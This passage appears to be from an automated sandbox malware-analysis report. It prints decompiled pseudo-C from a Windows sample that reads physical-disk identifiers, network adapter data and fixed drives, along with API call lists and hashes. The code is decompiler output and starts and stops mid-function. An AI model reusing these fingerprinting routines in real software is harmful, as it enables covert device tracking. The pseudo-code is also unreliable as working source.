				void* _t42;
				signed int _t46;
				void* _t47;
				void* _t49;
				struct _OVERLAPPED* _t50;
				void* _t58;
				void* _t59;
				signed int _t62;
				void* _t63;

				_t62 =  &_v1324;
				_t32 =  *0xd64070; // 0x8a9e1774
				_v4 = _t32 ^ _t62;
				_t50 = 0;
				_v1320 = _a4;
				_v1324 = 0;
				do {
					E00CF6CEB( &_v260, 0x100, "\\\\.\\PhysicalDrive%d", _t50);
					_t62 = _t62 + 0x10;
					_t57 =  &_v260;
					_t58 = CreateFileA( &_v260, 0xc0000000, 7, 0, 3, 0, 0);
					if(_t58 == 0xffffffff) {
						goto L9;
					}
					_v1308 = 0;
					_v1304 = 0;
					_v1300 = 0;
					_v1296 = 0;
					_v1292 = 0;
					_v1288 = 0;
					_v1312 = 0;
					if(DeviceIoControl(_t58, 0x74080, 0, 0,  &_v1308, 0x18,  &_v1312, 0) == 0) {
						goto L9;
					}
					_t42 = E00D017AD(_t50,  &_v260, _t58, 0x221);
					_t63 = _t62 + 4;
					_t57 =  &_v1316;
					_t59 = _t42;
					 *((char*)(_t59 + 0xa)) = 0xec;
					_v1316 = 0;
					if(DeviceIoControl(_t58, 0x7c088, _t59, 0x21, _t59, 0x221,  &_v1316, 0) == 0) {
						L8:
						CloseHandle(_t58);
						_push(_t59);
						E00D0092B(_t50, _t57, _t58, _t59, _t70);
						_t62 = _t63 + 4;
						if(_v1324 != 0) {
							break;
						}
						goto L9;
					}
					_t46 = 0;
					do {
						 *(_t63 + 0x38 + _t46 * 4) =  *(_t59 + 0x10 + _t46 * 2) & 0x0000ffff;
						_t46 = _t46 + 1;
					} while (_t46 < 0x100);
					_t57 =  &_v1284;
					_t47 = E00D005A0( &_v1284, 0xa, 0x13);
					_t63 = _t63 + 0xc;
					_t49 = E00C927A0(_v1320, _a8, _t47);
					_t70 = _t49;
					if(_t49 == 0) {
						_v1324 = 1;
					}
					goto L8;
					L9:
					_t50 =  &(_t50->Internal);
				} while (_t50 < 0x10);
				return E00D0071A(_v1324, _t50, _v4 ^ _t62, _t57, _t58, _t59);
			}





























                                                                                                                                                                                          0x00cfe8b0
                                                                                                                                                                                          0x00cfe8b6
                                                                                                                                                                                          0x00cfe8bd
                                                                                                                                                                                          0x00cfe8d4
                                                                                                                                                                                          0x00cfe8d7
                                                                                                                                                                                          0x00cfe8db
                                                                                                                                                                                          0x00cfe8e0
                                                                                                                                                                                          0x00cfe8f3
                                                                                                                                                                                          0x00cfe8f8
                                                                                                                                                                                          0x00cfe90a
                                                                                                                                                                                          0x00cfe918
                                                                                                                                                                                          0x00cfe91d
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00cfe926
                                                                                                                                                                                          0x00cfe92a
                                                                                                                                                                                          0x00cfe92e
                                                                                                                                                                                          0x00cfe932
                                                                                                                                                                                          0x00cfe936
                                                                                                                                                                                          0x00cfe93a
                                                                                                                                                                                          0x00cfe954
                                                                                                                                                                                          0x00cfe960
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00cfe96b
                                                                                                                                                                                          0x00cfe970
                                                                                                                                                                                          0x00cfe975
                                                                                                                                                                                          0x00cfe97f
                                                                                                                                                                                          0x00cfe98a
                                                                                                                                                                                          0x00cfe98f
                                                                                                                                                                                          0x00cfe99b
                                                                                                                                                                                          0x00cfe9e1
                                                                                                                                                                                          0x00cfe9e2
                                                                                                                                                                                          0x00cfe9e8
                                                                                                                                                                                          0x00cfe9e9
                                                                                                                                                                                          0x00cfe9ee
                                                                                                                                                                                          0x00cfe9f6
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00cfe9f6
                                                                                                                                                                                          0x00cfe99d
                                                                                                                                                                                          0x00cfe9a0
                                                                                                                                                                                          0x00cfe9a5
                                                                                                                                                                                          0x00cfe9a9
                                                                                                                                                                                          0x00cfe9aa
                                                                                                                                                                                          0x00cfe9b3
                                                                                                                                                                                          0x00cfe9ba
                                                                                                                                                                                          0x00cfe9c3
                                                                                                                                                                                          0x00cfe9d0
                                                                                                                                                                                          0x00cfe9d5
                                                                                                                                                                                          0x00cfe9d7
                                                                                                                                                                                          0x00cfe9d9
                                                                                                                                                                                          0x00cfe9d9
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00cfe9f8
                                                                                                                                                                                          0x00cfe9f8
                                                                                                                                                                                          0x00cfe9f9
                                                                                                                                                                                          0x00cfea1e

                                                                                                                                                                                          APIs
                                                                                                                                                                                            • Part of subcall function 00CF6CEB: _vswprintf_s.LIBCMT ref: 00CF6D1D
                                                                                                                                                                                          • CreateFileA.KERNEL32(?,C0000000,00000007,00000000,00000003,00000000,00000000,?,?,?,?), ref: 00CFE912
                                                                                                                                                                                          • DeviceIoControl.KERNEL32 ref: 00CFE95C
                                                                                                                                                                                          • _malloc.LIBCMT ref: 00CFE96B
                                                                                                                                                                                            • Part of subcall function 00D017AD: __FF_MSGBANNER.LIBCMT ref: 00D017D0
                                                                                                                                                                                            • Part of subcall function 00D017AD: __NMSG_WRITE.LIBCMT ref: 00D017D7
                                                                                                                                                                                            • Part of subcall function 00D017AD: RtlAllocateHeap.NTDLL(00000000,?,00000001,00000000,00000000,?,00D0C457,?,00000001,?,?,00D0EF54,00000018,00D590E8,0000000C,00D0EFE5), ref: 00D01824
                                                                                                                                                                                          • DeviceIoControl.KERNEL32 ref: 00CFE997
                                                                                                                                                                                          • CloseHandle.KERNEL32(00000000), ref: 00CFE9E2
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000001.00000002.537362630.0000000000C81000.00000020.00000001.01000000.00000004.sdmp, Offset: 00C80000, based on PE: true
                                                                                                                                                                                          • Associated: 00000001.00000002.537326906.0000000000C80000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537675953.0000000000D3A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537750623.0000000000D5D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537775522.0000000000D5E000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537801127.0000000000D60000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537839655.0000000000D65000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537865172.0000000000D66000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537894031.0000000000D6B000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.538818588.0000000000FA8000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_1_2_c80000_UNK_.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: ControlDevice$AllocateCloseCreateFileHandleHeap_malloc_vswprintf_s
                                                                                                                                                                                          • String ID: \\.\PhysicalDrive%d
                                                                                                                                                                                          • API String ID: 15615210-2935326385
                                                                                                                                                                                          • Opcode ID: f5061a7cfa739a1fa75ebe1e5c46418096244b585da8f000796675ddecba48a9
                                                                                                                                                                                          • Instruction ID: 4df05a4072cc34e114a0993bfbffd8df696e4ffa796eb0f34c47e163f6da1b6a
                                                                                                                                                                                          • Opcode Fuzzy Hash: f5061a7cfa739a1fa75ebe1e5c46418096244b585da8f000796675ddecba48a9
                                                                                                                                                                                          • Instruction Fuzzy Hash: C63184716043006FE3A0DB689C86FBBBBE8EB95714F40091DB699D61D0E7B496048B67
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 00C86759 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 73fileCOMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          C-Code - Quality: 89%
                                                                                                                                                                                          			E00C86759(void* __ebx, struct _OVERLAPPED* __ebp, void* __eflags, intOrPtr _a16, long _a20, intOrPtr _a24, void _a28, void _a32, intOrPtr _a36, signed int _a40, intOrPtr _a52) {
				void* __edi;
				intOrPtr _t28;
				void* _t29;
				void* _t30;
				void* _t36;
				void* _t37;
				void* _t38;
				void* _t39;
				struct _OVERLAPPED* _t40;
				void* _t42;

				_t40 = __ebp;
				_t29 = __ebx;
				do {
					E00C83BA0(_t29, 0x2800, "\\\\.\\PhysicalDrive%d", _t36);
					_t42 = _t42 + 8;
					_t38 = CreateFileA(_t29, _t40, 3, _t40, 3, 0x80, _t40);
					if(_t38 == 0xffffffff) {
						goto L6;
					}
					_a28 = 0;
					_a32 = 0;
					_a36 = 0;
					_a28 = _t40;
					_a32 = _t40;
					E00D006A0(_t36, _t29, _t40, 0x2800);
					_t42 = _t42 + 0xc;
					if(DeviceIoControl(_t38, 0x2d1400,  &_a28, 0xc, _t29, 0x2800,  &_a20, _t40) != 0) {
						_t25 =  *((intOrPtr*)(_t29 + 0x18));
						if( *((intOrPtr*)(_t29 + 0x18)) > _t40) {
							_t35 = _a24;
							_t28 = E00C86470(_a52, "DISKID:", _a24, _t25 + _t29);
							_t42 = _t42 + 0xc;
							_a16 = _t28;
						}
					}
					CloseHandle(_t38);
					if(_a16 != _t40) {
						break;
					}
					L6:
					_t36 = _t36 + 1;
					_t51 = _t36 - 0x10;
				} while (_t36 < 0x10);
				E00D0092B(_t29, _t35, _t36, _t38, _t51);
				_t37 = _t29;
				_pop(_t39);
				_pop(_t30);
				return E00D0071A(_a16, _t30, _a40 ^ _t42 + 0x00000004, _t35, _t37, _t39);
			}













                                                                                                                                                                                          0x00c86759
                                                                                                                                                                                          0x00c86759
                                                                                                                                                                                          0x00c86760
                                                                                                                                                                                          0x00c8676b
                                                                                                                                                                                          0x00c86770
                                                                                                                                                                                          0x00c86786
                                                                                                                                                                                          0x00c8678b
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00c86795
                                                                                                                                                                                          0x00c86799
                                                                                                                                                                                          0x00c8679e
                                                                                                                                                                                          0x00c867a2
                                                                                                                                                                                          0x00c867a6
                                                                                                                                                                                          0x00c867aa
                                                                                                                                                                                          0x00c867af
                                                                                                                                                                                          0x00c867d3
                                                                                                                                                                                          0x00c867d5
                                                                                                                                                                                          0x00c867da
                                                                                                                                                                                          0x00c867dc
                                                                                                                                                                                          0x00c867ed
                                                                                                                                                                                          0x00c867f2
                                                                                                                                                                                          0x00c867f5
                                                                                                                                                                                          0x00c867f5
                                                                                                                                                                                          0x00c867da
                                                                                                                                                                                          0x00c867fa
                                                                                                                                                                                          0x00c86804
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00c86806
                                                                                                                                                                                          0x00c86806
                                                                                                                                                                                          0x00c86807
                                                                                                                                                                                          0x00c86807
                                                                                                                                                                                          0x00c86811
                                                                                                                                                                                          0x00c8681d
                                                                                                                                                                                          0x00c8681e
                                                                                                                                                                                          0x00c8681f
                                                                                                                                                                                          0x00c8682f

                                                                                                                                                                                          APIs
                                                                                                                                                                                            • Part of subcall function 00C83BA0: _vswprintf_s.LIBCMT ref: 00C83BCC
                                                                                                                                                                                          • CreateFileA.KERNEL32(00000000,00000000,00000003,00000000,00000003,00000080,00000000,00000000,00002000,?,?,?,?,?,00C86584,00000000), ref: 00C86780
                                                                                                                                                                                          • _memset.LIBCMT ref: 00C867AA
                                                                                                                                                                                          • DeviceIoControl.KERNEL32 ref: 00C867CB
                                                                                                                                                                                          • CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,00C86584,00000000,00002000,00C814D1), ref: 00C867FA
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000001.00000002.537362630.0000000000C81000.00000020.00000001.01000000.00000004.sdmp, Offset: 00C80000, based on PE: true
                                                                                                                                                                                          • Associated: 00000001.00000002.537326906.0000000000C80000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537675953.0000000000D3A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537750623.0000000000D5D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537775522.0000000000D5E000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537801127.0000000000D60000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537839655.0000000000D65000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537865172.0000000000D66000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537894031.0000000000D6B000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.538818588.0000000000FA8000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_1_2_c80000_UNK_.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: CloseControlCreateDeviceFileHandle_memset_vswprintf_s
                                                                                                                                                                                          • String ID: DISKID:$\\.\PhysicalDrive%d
                                                                                                                                                                                          • API String ID: 2627556037-3765948602
                                                                                                                                                                                          • Opcode ID: 1272aeaace59c33dfc45ed6b06f6d0fb9839f99d97321a673c2c633f77f243ba
                                                                                                                                                                                          • Instruction ID: 26a67cb5dcba487c2d578548c93072394688b44f5f970f1f08b8016cf94ff93a
                                                                                                                                                                                          • Opcode Fuzzy Hash: 1272aeaace59c33dfc45ed6b06f6d0fb9839f99d97321a673c2c633f77f243ba
                                                                                                                                                                                          • Instruction Fuzzy Hash: 731196716043047FE240EF19EC86F2B77D8EB84758F44092DF589D62C1D730AA0487A6
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 00CE7A6A Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 52COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          C-Code - Quality: 78%
                                                                                                                                                                                          			E00CE7A6A(void* __edx, void* __eflags) {
				char _v8;
				void* __edi;
				void* __esi;
				void* __ebp;
				char* _t9;
				intOrPtr* _t11;
				void* _t14;
				void* _t22;
				intOrPtr* _t26;

				_t20 = __edx;
				_t22 = 0;
				_v8 = 0x288;
				_t26 = E00D017AD(_t14, __edx, 0, 0x288);
				if(_t26 != 0) {
					_t9 =  &_v8;
					_push(_t9);
					_push(_t26);
					L00D2F374();
					_t30 = _t9 - 0x6f;
					if(_t9 != 0x6f) {
						L4:
						if(_t9 == 0) {
							_t11 = _t26;
							while( *((char*)(_t11 + 0x1d8)) == 0) {
								_t11 =  *_t11;
								_t34 = _t11;
								if(_t11 != 0) {
									continue;
								} else {
								}
								goto L10;
							}
							_t22 = 1;
							__eflags = 1;
						}
					} else {
						_push(_t26);
						E00D0092B(_t14, __edx, 0, _t26, _t30);
						_t26 = E00D017AD(_t14, _t20, 0, _v8);
						if(_t26 != 0) {
							_t9 =  &_v8;
							_push(_t9);
							_push(_t26);
							L00D2F374();
							goto L4;
						}
					}
					L10:
					_push(_t26);
					E00D0092B(_t14, _t20, _t22, _t26, _t34);
				}
				return _t22;
			}












                                                                                                                                                                                          0x00ce7a6a
                                                                                                                                                                                          0x00ce7a76
                                                                                                                                                                                          0x00ce7a78
                                                                                                                                                                                          0x00ce7a80
                                                                                                                                                                                          0x00ce7a85
                                                                                                                                                                                          0x00ce7a87
                                                                                                                                                                                          0x00ce7a8a
                                                                                                                                                                                          0x00ce7a8b
                                                                                                                                                                                          0x00ce7a8c
                                                                                                                                                                                          0x00ce7a91
                                                                                                                                                                                          0x00ce7a94
                                                                                                                                                                                          0x00ce7ab6
                                                                                                                                                                                          0x00ce7ab8
                                                                                                                                                                                          0x00ce7aba
                                                                                                                                                                                          0x00ce7abc
                                                                                                                                                                                          0x00ce7ac5
                                                                                                                                                                                          0x00ce7ac7
                                                                                                                                                                                          0x00ce7ac9
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00ce7acb
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00ce7ac9
                                                                                                                                                                                          0x00ce7acf
                                                                                                                                                                                          0x00ce7acf
                                                                                                                                                                                          0x00ce7acf
                                                                                                                                                                                          0x00ce7a96
                                                                                                                                                                                          0x00ce7a96
                                                                                                                                                                                          0x00ce7a97
                                                                                                                                                                                          0x00ce7aa4
                                                                                                                                                                                          0x00ce7aaa
                                                                                                                                                                                          0x00ce7aac
                                                                                                                                                                                          0x00ce7aaf
                                                                                                                                                                                          0x00ce7ab0
                                                                                                                                                                                          0x00ce7ab1
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00ce7ab1
                                                                                                                                                                                          0x00ce7aaa
                                                                                                                                                                                          0x00ce7ad0
                                                                                                                                                                                          0x00ce7ad0
                                                                                                                                                                                          0x00ce7ad1
                                                                                                                                                                                          0x00ce7ad6
                                                                                                                                                                                          0x00ce7adc

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • _malloc.LIBCMT ref: 00CE7A7B
                                                                                                                                                                                            • Part of subcall function 00D017AD: __FF_MSGBANNER.LIBCMT ref: 00D017D0
                                                                                                                                                                                            • Part of subcall function 00D017AD: __NMSG_WRITE.LIBCMT ref: 00D017D7
                                                                                                                                                                                            • Part of subcall function 00D017AD: RtlAllocateHeap.NTDLL(00000000,?,00000001,00000000,00000000,?,00D0C457,?,00000001,?,?,00D0EF54,00000018,00D590E8,0000000C,00D0EFE5), ref: 00D01824
                                                                                                                                                                                          • _malloc.LIBCMT ref: 00CE7A9F
                                                                                                                                                                                          • GetAdaptersInfo.IPHLPAPI(00000000,?), ref: 00CE7AB1
                                                                                                                                                                                          • GetAdaptersInfo.IPHLPAPI(00000000,?), ref: 00CE7A8C
                                                                                                                                                                                            • Part of subcall function 00D0092B: __lock.LIBCMT ref: 00D00949
                                                                                                                                                                                            • Part of subcall function 00D0092B: ___sbh_find_block.LIBCMT ref: 00D00954
                                                                                                                                                                                            • Part of subcall function 00D0092B: ___sbh_free_block.LIBCMT ref: 00D00963
                                                                                                                                                                                            • Part of subcall function 00D0092B: RtlFreeHeap.NTDLL(00000000,?,00D58A38,0000000C,00D10CFD,00000000,?,00D0C457,?,00000001,?,?,00D0EF54,00000018,00D590E8,0000000C), ref: 00D00993
                                                                                                                                                                                            • Part of subcall function 00D0092B: GetLastError.KERNEL32(?,00D0C457,?,00000001,?,?,00D0EF54,00000018,00D590E8,0000000C,00D0EFE5,?,?,?,00D10DB7,0000000D), ref: 00D009A4
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000001.00000002.537362630.0000000000C81000.00000020.00000001.01000000.00000004.sdmp, Offset: 00C80000, based on PE: true
                                                                                                                                                                                          • Associated: 00000001.00000002.537326906.0000000000C80000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537675953.0000000000D3A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537750623.0000000000D5D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537775522.0000000000D5E000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537801127.0000000000D60000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537839655.0000000000D65000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537865172.0000000000D66000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537894031.0000000000D6B000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.538818588.0000000000FA8000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_1_2_c80000_UNK_.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: AdaptersHeapInfo_malloc$AllocateErrorFreeLast___sbh_find_block___sbh_free_block__lock
                                                                                                                                                                                          • String ID: Q360InstallerMainWnd
                                                                                                                                                                                          • API String ID: 548094864-1994564140
                                                                                                                                                                                          • Opcode ID: ccddedf0cdfd176bcb96261e9182214d1f467433d21153b5ea19fdb20755edec
                                                                                                                                                                                          • Instruction ID: 57d983e1acbf8bae544cc99a289e8414de1b5e396089f49c199afd4d8ff1c78b
                                                                                                                                                                                          • Opcode Fuzzy Hash: ccddedf0cdfd176bcb96261e9182214d1f467433d21153b5ea19fdb20755edec
                                                                                                                                                                                          • Instruction Fuzzy Hash: D601C836D09564BAE721E667ED01EAF66ECCFD1724F141676F910E7141DB209F0162B0
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 00D0071A Relevance: 7.6, APIs: 5, Instructions: 58COMMONLIBRARYCODE
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          C-Code - Quality: 85%
                                                                                                                                                                                          			E00D0071A(intOrPtr __eax, intOrPtr __ebx, intOrPtr __ecx, intOrPtr __edx, intOrPtr __edi, intOrPtr __esi, char _a4) {
				intOrPtr _v0;
				void* _v804;
				intOrPtr _v808;
				intOrPtr _v812;
				intOrPtr _t6;
				intOrPtr _t11;
				intOrPtr _t12;
				intOrPtr _t13;
				long _t17;
				intOrPtr _t21;
				intOrPtr _t22;
				intOrPtr _t25;
				intOrPtr _t26;
				intOrPtr _t27;
				intOrPtr* _t31;
				void* _t34;

				_t27 = __esi;
				_t26 = __edi;
				_t25 = __edx;
				_t22 = __ecx;
				_t21 = __ebx;
				_t6 = __eax;
				_t34 = _t22 -  *0xd64070; // 0x8a9e1774
				if(_t34 == 0) {
					asm("repe ret");
				}
				 *0xd68208 = _t6;
				 *0xd68204 = _t22;
				 *0xd68200 = _t25;
				 *0xd681fc = _t21;
				 *0xd681f8 = _t27;
				 *0xd681f4 = _t26;
				 *0xd68220 = ss;
				 *0xd68214 = cs;
				 *0xd681f0 = ds;
				 *0xd681ec = es;
				 *0xd681e8 = fs;
				 *0xd681e4 = gs;
				asm("pushfd");
				_pop( *0xd68218);
				 *0xd6820c =  *_t31;
				 *0xd68210 = _v0;
				 *0xd6821c =  &_a4;
				 *0xd68158 = 0x10001;
				_t11 =  *0xd68210; // 0x0
				 *0xd6810c = _t11;
				 *0xd68100 = 0xc0000409;
				 *0xd68104 = 1;
				_t12 =  *0xd64070; // 0x8a9e1774
				_v812 = _t12;
				_t13 =  *0xd64074; // 0x7561e88b
				_v808 = _t13;
				 *0xd68150 = IsDebuggerPresent();
				_push(1);
				E00D1DA7A(_t14);
				SetUnhandledExceptionFilter(0);
				_t17 = UnhandledExceptionFilter(0xd44f80);
				if( *0xd68150 == 0) {
					_push(1);
					E00D1DA7A(_t17);
				}
				return TerminateProcess(GetCurrentProcess(), 0xc0000409);
			}



















                                                                                                                                                                                          0x00d0071a
                                                                                                                                                                                          0x00d0071a
                                                                                                                                                                                          0x00d0071a
                                                                                                                                                                                          0x00d0071a
                                                                                                                                                                                          0x00d0071a
                                                                                                                                                                                          0x00d0071a
                                                                                                                                                                                          0x00d0071a
                                                                                                                                                                                          0x00d00720
                                                                                                                                                                                          0x00d00722
                                                                                                                                                                                          0x00d00722
                                                                                                                                                                                          0x00d0e890
                                                                                                                                                                                          0x00d0e895
                                                                                                                                                                                          0x00d0e89b
                                                                                                                                                                                          0x00d0e8a1
                                                                                                                                                                                          0x00d0e8a7
                                                                                                                                                                                          0x00d0e8ad
                                                                                                                                                                                          0x00d0e8b3
                                                                                                                                                                                          0x00d0e8ba
                                                                                                                                                                                          0x00d0e8c1
                                                                                                                                                                                          0x00d0e8c8
                                                                                                                                                                                          0x00d0e8cf
                                                                                                                                                                                          0x00d0e8d6
                                                                                                                                                                                          0x00d0e8dd
                                                                                                                                                                                          0x00d0e8de
                                                                                                                                                                                          0x00d0e8e7
                                                                                                                                                                                          0x00d0e8ef
                                                                                                                                                                                          0x00d0e8f7
                                                                                                                                                                                          0x00d0e902
                                                                                                                                                                                          0x00d0e90c
                                                                                                                                                                                          0x00d0e911
                                                                                                                                                                                          0x00d0e916
                                                                                                                                                                                          0x00d0e920
                                                                                                                                                                                          0x00d0e92a
                                                                                                                                                                                          0x00d0e92f
                                                                                                                                                                                          0x00d0e935
                                                                                                                                                                                          0x00d0e93a
                                                                                                                                                                                          0x00d0e946
                                                                                                                                                                                          0x00d0e94b
                                                                                                                                                                                          0x00d0e94d
                                                                                                                                                                                          0x00d0e955
                                                                                                                                                                                          0x00d0e960
                                                                                                                                                                                          0x00d0e96d
                                                                                                                                                                                          0x00d0e96f
                                                                                                                                                                                          0x00d0e971
                                                                                                                                                                                          0x00d0e976
                                                                                                                                                                                          0x00d0e98a

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • IsDebuggerPresent.KERNEL32 ref: 00D0E940
                                                                                                                                                                                          • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00D0E955
                                                                                                                                                                                          • UnhandledExceptionFilter.KERNEL32(00D44F80), ref: 00D0E960
                                                                                                                                                                                          • GetCurrentProcess.KERNEL32(C0000409), ref: 00D0E97C
                                                                                                                                                                                          • TerminateProcess.KERNEL32(00000000), ref: 00D0E983
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000001.00000002.537362630.0000000000C81000.00000020.00000001.01000000.00000004.sdmp, Offset: 00C80000, based on PE: true
                                                                                                                                                                                          • Associated: 00000001.00000002.537326906.0000000000C80000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537675953.0000000000D3A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537750623.0000000000D5D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537775522.0000000000D5E000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537801127.0000000000D60000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537839655.0000000000D65000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537865172.0000000000D66000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537894031.0000000000D6B000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.538818588.0000000000FA8000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_1_2_c80000_UNK_.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: ExceptionFilterProcessUnhandled$CurrentDebuggerPresentTerminate
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 2579439406-0
                                                                                                                                                                                          • Opcode ID: f1a49ee11a8ccb178966ba0f26e2b33206b7e260f1d367dfbab2d2ff5ecc5553
                                                                                                                                                                                          • Instruction ID: f8a619841a55ab797221375ef94f40472013eeeb95773aeb0c55eaa2f8ca6bbc
                                                                                                                                                                                          • Opcode Fuzzy Hash: f1a49ee11a8ccb178966ba0f26e2b33206b7e260f1d367dfbab2d2ff5ecc5553
                                                                                                                                                                                          • Instruction Fuzzy Hash: CF21DDB8940344DFC750DF68FD586543BA4BB1A309F10861AE948C7360EBF95982AF7A
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 00CED4D5 Relevance: 6.0, APIs: 4, Instructions: 48COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          C-Code - Quality: 78%
                                                                                                                                                                                          			E00CED4D5(intOrPtr __ebx, intOrPtr __edx, void* __eflags, intOrPtr _a4) {
				signed int _v8;
				short _v2056;
				void* __edi;
				void* __esi;
				signed int _t11;
				intOrPtr _t23;
				intOrPtr _t29;
				intOrPtr _t31;
				WCHAR* _t32;
				signed int _t33;

				_t29 = __edx;
				_t23 = __ebx;
				_t11 =  *0xd64070; // 0x8a9e1774
				_v8 = _t11 ^ _t33;
				_t30 = _a4;
				E00CAF1DC(_a4);
				E00D006A0(_a4,  &_v2056, 0, 0x800);
				if(GetLogicalDriveStringsW(0x400,  &_v2056) != 0) {
					_push(_t31);
					_t32 =  &_v2056;
					if(_v2056 != 0) {
						do {
							if(GetDriveTypeW(_t32) == 3) {
								E00CAF961(_t30, _t30, _t32);
							}
							_t32 = _t32 + 2 + E00D00EBB(_t32) * 2;
						} while ( *_t32 != 0);
					}
					_pop(_t31);
				}
				return E00D0071A(1, _t23, _v8 ^ _t33, _t29, _t30, _t31);
			}













                                                                                                                                                                                          0x00ced4d5
                                                                                                                                                                                          0x00ced4d5
                                                                                                                                                                                          0x00ced4de
                                                                                                                                                                                          0x00ced4e5
